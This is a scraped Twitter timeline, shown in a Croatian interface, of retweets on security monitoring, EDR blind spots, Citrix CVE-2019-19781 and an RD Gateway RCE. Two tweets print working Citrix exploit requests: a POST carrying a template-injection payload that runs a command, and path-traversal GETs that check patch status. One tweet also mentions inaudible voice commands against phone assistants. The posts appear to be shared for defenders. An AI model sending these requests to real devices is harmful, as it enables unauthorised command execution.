Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @Nekyz_
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @Nekyz_
-
Nekyz proslijedio/la je Tweet
Can your EDR detect symbolic link callback rootkits? Because ours sure as heck can't.
@aionescu and I wrote about these! https://windows-internals.com/dkom-now-with-symbolic-links/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
"I wonder if that payload alerted anything..." -- looks through the SOC's windows "Nope. We're good..."
#UseBlindspic.twitter.com/oMXj8MP9Wy
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
What IT people think: “I need to control program updates and approve them because I’m uniquely intelligent and totally have the time to validate other people’s software.” What that looks like after 3 years:pic.twitter.com/RJjLHFhplq
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
A map of Citrix devices that are vulnerable to CVE-2019-19781pic.twitter.com/38z83Hu4X0
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
Ladies and gentlemen, I present you a working Remote Code Execution (RCE) exploit for the Remote Desktop Gateway (CVE-2020-0609 & CVE-2020-0610). Accidentally followed a few rabbit holes but got it to work! Time to write a blog post ;) Don't forget to patch!pic.twitter.com/FekupjS6qG
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
What issues do people have with a
#Sysmon rollout in an enterprise? Log volume? I’ve seen orgs worried about 20GB of daily Sysmon log data, while at the same time spending a 6 figure sum on a license to process 500GB of daily firewall log data. (which is mostly useless)Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
Log Sources - ordered by priority - with ratings in different categories - personal and highly subjective assessment - from my most recent slide deck on low hanging fruits in security monitoring
#SIEM#SecurityMonitoring#ThreatHuntingpic.twitter.com/wuWImWLB77
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+http://template.new ({'BLOCK'='print+`id`'})%]
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
It never ceases to surprise me that so much of hacking can be summed up by the simple question: "You put WHAT, WHERE?"
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
CVE-2019-19781 Citrix path traversal base on vpns folder Example: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf patch >> HTTP/1.1 403 Forbidden no patch >> HTTP/1.1 200 OK [global] encrypt passwords = yes name resolve order = lmhosts wins host bcastpic.twitter.com/a6ehfTRIaJ
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Nekyz proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Nekyz proslijedio/la je Tweet
Log Sources Top 5 (ordered by cost-benefit ratio / volume > detectable threats) 1. Antivirus 2. Windows Eventlog (+Sysmon) 3. Proxy 4. Firewall 5. DNS
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
“Siri, Ok Google, Please delete all my emails.” PacSec 2019 Church of Hacking Day 2: Bin Zhao demonstrating CommanderSong, YouTube song videos that embed hidden commands your phone voice recognition will recognize with 100% success rate that are effectively inaudible to humanspic.twitter.com/l5LSye2Yx6
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Nekyz proslijedio/la je Tweet
*apple watch buzzes*: meeting in 10 *phone calendar pop up*: meeting in 10 *desktop calendar pop up*: meeting in 10 *slack reminder*: meeting in 10 YEAH OK I GOT IT, MEETING IN 10 11 minutes later: OH FUCK MY MEETING
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
Never seen this technique before.. Fake Captcha.
#SocialEngineeringpic.twitter.com/boMif9ZTgG
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je Tweet
Amazing work by Miriam Wiesner (
@miriamxyra) on creating visibility and mapping between MITRE and windows event logs allowing to create GPOs for better and more intelligent choices#hacklu https://github.com/miriamxyra/EventList … https://youtu.be/nkMDsw4MA48Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nekyz proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
Yin
